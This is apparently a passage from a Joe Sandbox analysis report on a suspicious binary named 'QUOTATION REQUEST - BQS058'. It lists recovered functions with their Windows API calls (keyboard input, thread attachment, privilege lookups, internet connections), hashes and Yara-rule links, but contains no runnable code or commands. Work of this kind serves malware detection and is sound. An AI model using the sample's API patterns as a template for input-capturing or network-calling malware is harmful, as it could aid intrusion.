Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f3d6fd23587dab2ce0bcba8a0d7526177488ed82416d06b09cfae3622ce7b879
Instruction ID: c2e501eacf4aeeaf3b2ecc26b074df9d1281bac63d90beabd76580de8318ded4
Opcode Fuzzy Hash: f3d6fd23587dab2ce0bcba8a0d7526177488ed82416d06b09cfae3622ce7b879
Instruction Fuzzy Hash: B5312870A41319AEFB798E2D8805BFEBBEDABC5318F04429AF6D1521D9C3B985408761

Function 01030C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 01030C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 01030C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 01030CE1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 01030D33

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2122cd64ae6a62c36d4443172b19cff9ea63caf442598207b1e6e2f22374f437
Instruction ID: 71c022fb01c07929da3d898b0461f335e35f984d19a47627a8110e3e0bd5c293
Opcode Fuzzy Hash: 2122cd64ae6a62c36d4443172b19cff9ea63caf442598207b1e6e2f22374f437
Instruction Fuzzy Hash: FF31247091131CAEFF319B288808BFEBBEEAB85310F04429AF5C5521D9C379954587A2

Function 010061C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010061FB
__isleadbyte_l.LIBCMT ref: 01006229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 01006257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0100628D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 0432306c90cea796c7e9a51430250f73c835e692d76f17d439b1c42729a2152b
Instruction ID: 859efdf1c6df6fa849859b09917167d3fea7abecd5a6d0f76f973b484337062b
Opcode Fuzzy Hash: 0432306c90cea796c7e9a51430250f73c835e692d76f17d439b1c42729a2152b
Instruction Fuzzy Hash: F431C030604646AFFB228E68CC44BBA7FEABF42310F154068E9A4871E1D732D960D790

Function 01054EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 01054F02

Part of subcall function 01033641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0103365B
Part of subcall function 01033641: GetCurrentThreadId.KERNEL32 ref: 01033662
Part of subcall function 01033641: AttachThreadInput.USER32(00000000,?,01035005), ref: 01033669

GetCaretPos.USER32(?), ref: 01054F13
ClientToScreen.USER32(00000000,?), ref: 01054F4E
GetForegroundWindow.USER32 ref: 01054F54

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 6de6cb8dbb9dc95a90e2ae9f16825993777d5afb9737aea7501f7561ebb87387
Instruction ID: f64cbc15592cdeaf218540a4cfa734061bc2c192e5332b525742d404f6ec95bd
Opcode Fuzzy Hash: 6de6cb8dbb9dc95a90e2ae9f16825993777d5afb9737aea7501f7561ebb87387
Instruction Fuzzy Hash: 7A312D71D00209AFCB10EFA9CC859EFB7FDEF98300F04406AE855E7241EA759E459BA0

Function 0105C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623

GetCursorPos.USER32(?), ref: 0105C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0100B9AB,?,?,?,?,?), ref: 0105C4E7
GetCursorPos.USER32(?), ref: 0105C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0100B9AB,?,?,?), ref: 0105C56E

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: d2d7aa585010b9872da41cff7250efd273641b23548ddb8fc5889889502108d9
Instruction ID: 963e9399efa9d3c719df4751368daf419e942e240172d3710afff1ca22adc1a1
Opcode Fuzzy Hash: d2d7aa585010b9872da41cff7250efd273641b23548ddb8fc5889889502108d9
Instruction Fuzzy Hash: 8231C335500118AFEFA68F99C858EAB7FF9FB09314F044099FE858B251C7359990DFA4

Function 01028656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0102810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01028121
Part of subcall function 0102810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0102812B
Part of subcall function 0102810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0102813A
Part of subcall function 0102810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01028141
Part of subcall function 0102810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01028157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010286A3
_memcmp.LIBCMT ref: 010286C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 010286FC
HeapFree.KERNEL32(00000000), ref: 01028703

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: d078e9bf74c2a90231482fe75fbf54e975a6b77db88c0821c0842737cb1c8ca5
Instruction ID: 3efe1a40b84f556ffc97a70b0c1e722c8572d9ec2a1ce23f25292535f76e62f2
Opcode Fuzzy Hash: d078e9bf74c2a90231482fe75fbf54e975a6b77db88c0821c0842737cb1c8ca5
Instruction Fuzzy Hash: F921B031E00219EFDB20DFA8C948BEEBBF8FF55314F14809AE585A7240D735AA05CB50

Function 00FF098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00FF09AE

Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01037896,?,?,00000000), ref: 00FD5A2C
Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01037896,?,?,00000000,?,?), ref: 00FD5A50

_fprintf.LIBCMT ref: 00FF09E5
OutputDebugStringW.KERNEL32(?), ref: 01025DBB

Part of subcall function 00FF4AAA: _flsall.LIBCMT ref: 00FF4AC3

__setmode.LIBCMT ref: 00FF0A1A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 68a5522ebf68cda0b55356b8aac5db311c718261d760e77c45c7e36804ac45f8
Instruction ID: 1a0a0994faf08e663ac2b126a45742171d91d88ab35ca32f585498ca0f98145d
Opcode Fuzzy Hash: 68a5522ebf68cda0b55356b8aac5db311c718261d760e77c45c7e36804ac45f8
Instruction Fuzzy Hash: EE113A3290420D6FDB04B6B49C469FFB7ADAF81320F18015AF30497293EE7C5846B7A5

Function 01041767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010417A3

Part of subcall function 0104182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104184C
Part of subcall function 0104182D: InternetCloseHandle.WININET(00000000), ref: 010418E9

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 91168e2b1d40d4732be7325b28cb99f323179d3b73e013cd3e141d37e5004395
Instruction ID: c7c0fd9061690fca2cc8b40b71d29a629276bdae7bd753f232de58cea0933057
Opcode Fuzzy Hash: 91168e2b1d40d4732be7325b28cb99f323179d3b73e013cd3e141d37e5004395
Instruction Fuzzy Hash: 272162B5200606BFEB129F64DC80FBBBBE9FF48710F10402EFA9596550DB75A45197A0

Function 01033A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0105FAC0), ref: 01033A64
GetLastError.KERNEL32 ref: 01033A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 01033A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0105FAC0), ref: 01033ADF

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 0e27cba276b936d8c6b6cfb30547bce7ace3c01b14be6335f22825b474db8f0a
Instruction ID: 222cec878a6c720e698986d09e0f3c573432478cace1f263002a9afdd814df4e
Opcode Fuzzy Hash: 0e27cba276b936d8c6b6cfb30547bce7ace3c01b14be6335f22825b474db8f0a
Instruction Fuzzy Hash: 9221A3745087029F8310EF28C88586B7BE8BF85264F144A5EF4D9CB292EB35D94ACB43

Function 01055D11 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 01055D80
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01055D9A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01055DA8
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01055DB6

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: e8405bad225d852c2fc70b8182af0e88f18fcee3af64e111766c37463e2064f4
Instruction ID: 02c40e1831c54031d8c7b9da91b7d578b84e39ae4a3967da8838227ae8a60667
Opcode Fuzzy Hash: e8405bad225d852c2fc70b8182af0e88f18fcee3af64e111766c37463e2064f4
Instruction Fuzzy Hash: 2A11A232205111AFDB54AB55DC18FBB7799EF85320F084119F956C73D1C769AD01C7A4

Function 010050E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 01005101

Part of subcall function 00FF571C: __FF_MSGBANNER.LIBCMT ref: 00FF5733
Part of subcall function 00FF571C: __NMSG_WRITE.LIBCMT ref: 00FF573A
Part of subcall function 00FF571C: RtlAllocateHeap.NTDLL(01560000,00000000,00000001,00000000,?,?,?,00FF0DD3,?), ref: 00FF575F

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: f43b849f1ba131092060ebd6278c946e55339c4144578df80e94fc6bdf0503f7
Instruction ID: 1e92b8dcce56a5df34fba5c51bde5678f32994fa1e5ad844fbc1d56e40230ab0
Opcode Fuzzy Hash: f43b849f1ba131092060ebd6278c946e55339c4144578df80e94fc6bdf0503f7
Instruction Fuzzy Hash: 1F110A72504619AEEF332F74AC056BE37D8AF443A1F104569FBC49A1E1DE3D84419F90

Function 00FD44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FD44CF

Part of subcall function 00FD407C: _memset.LIBCMT ref: 00FD40FC
Part of subcall function 00FD407C: _wcscpy.LIBCMT ref: 00FD4150
Part of subcall function 00FD407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FD4160

KillTimer.USER32(?,00000001,?,?), ref: 00FD4524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FD4533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0100D4B9

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 13d3f968b92e35d09888151b3a6a8607669c0a38bab4899b24b4c6dd67688e78
Instruction ID: 3b587ea71b847c1476df53a952fada8ab6a8d69e62518f0e0520ee03be0fb715
Opcode Fuzzy Hash: 13d3f968b92e35d09888151b3a6a8607669c0a38bab4899b24b4c6dd67688e78
Instruction Fuzzy Hash: 4021F8709043849FF7739BA49855BEBBBECAF01314F08008EE7CE56281C7792984DB51

Function 01046369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01037896,?,?,00000000), ref: 00FD5A2C
Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01037896,?,?,00000000,?,?), ref: 00FD5A50

gethostbyname.WSOCK32(?,?,?), ref: 01046399
WSAGetLastError.WSOCK32(00000000), ref: 010463A4
_memmove.LIBCMT ref: 010463D1
inet_ntoa.WSOCK32(?), ref: 010463DC

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e792b5efca116c58b3d533fda110363802d2011a4f677ddfe4cc91c609a728e7
Instruction ID: a672375f1c9581c24411165e8ad9c26bc855e35bcd5f103f67b0665d651b4f7e
Opcode Fuzzy Hash: e792b5efca116c58b3d533fda110363802d2011a4f677ddfe4cc91c609a728e7
Instruction Fuzzy Hash: 7E11607650010AAFCB00FBA4DD96CEEB7B9AF04310B084066F545A7261DF39AE04EB61

Function 01028B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 01028B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01028B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01028B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 01028BA4

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 36365a6ab55e68a143d4c4f0d49e30d320ec3932e5442d5298394cb03768c5f2
Instruction ID: 3527764936a8f1f909a5907d170eabeda850fab01383817928b34c214a39f522
Opcode Fuzzy Hash: 36365a6ab55e68a143d4c4f0d49e30d320ec3932e5442d5298394cb03768c5f2
Instruction Fuzzy Hash: 85112E79901219FFEB11DFA5CC85F9EBBB4FB48710F204096EA40B7250D6716E11DB94

Function 00FD1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623

DefDlgProcW.USER32(?,00000020,?), ref: 00FD12D8
GetClientRect.USER32(?,?), ref: 0100B5FB
GetCursorPos.USER32(?), ref: 0100B605
ScreenToClient.USER32(?,?), ref: 0100B610

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 99e980452e0327c16f0f583bcb448990c418bf3464d0ab9b34eb1468ab6fe35c
Instruction ID: 8280e26b00e24b97e83a2968ba857c7df364986ee6c7c820e1aa001646f62a42
Opcode Fuzzy Hash: 99e980452e0327c16f0f583bcb448990c418bf3464d0ab9b34eb1468ab6fe35c
Instruction Fuzzy Hash: 9A112B3550011AFBCB11EFA8D8859EF77BAFB05301F540456EA41E7240C73AAA519BA5

Function 01031142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 0103115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 01031184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 0103118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 010311C1

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 9e82d7ef020d4bfb2c0d7394460411eac9ff1ddd6f969f0014f7e1993c402245
Instruction ID: 578ff058107801af968531b796cff0464a582794d091bc6be8f3a9142e5d3884
Opcode Fuzzy Hash: 9e82d7ef020d4bfb2c0d7394460411eac9ff1ddd6f969f0014f7e1993c402245
Instruction Fuzzy Hash: DE111831D4161DD7CF10AFA5D848AEEBBB8FF4A711F044045EA81B2245CB7595508BD5

Function 0102D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0102D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0102D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0102D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0102D897

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: fc303ac1e0fe00a8242cf115b6ab566186df7522417ec4adb66a8b6397d6bc49
Instruction ID: b32116e4f4bb975e3db2784229beee9c2070f75159f43ad651a944f8bbf25f31
Opcode Fuzzy Hash: fc303ac1e0fe00a8242cf115b6ab566186df7522417ec4adb66a8b6397d6bc49
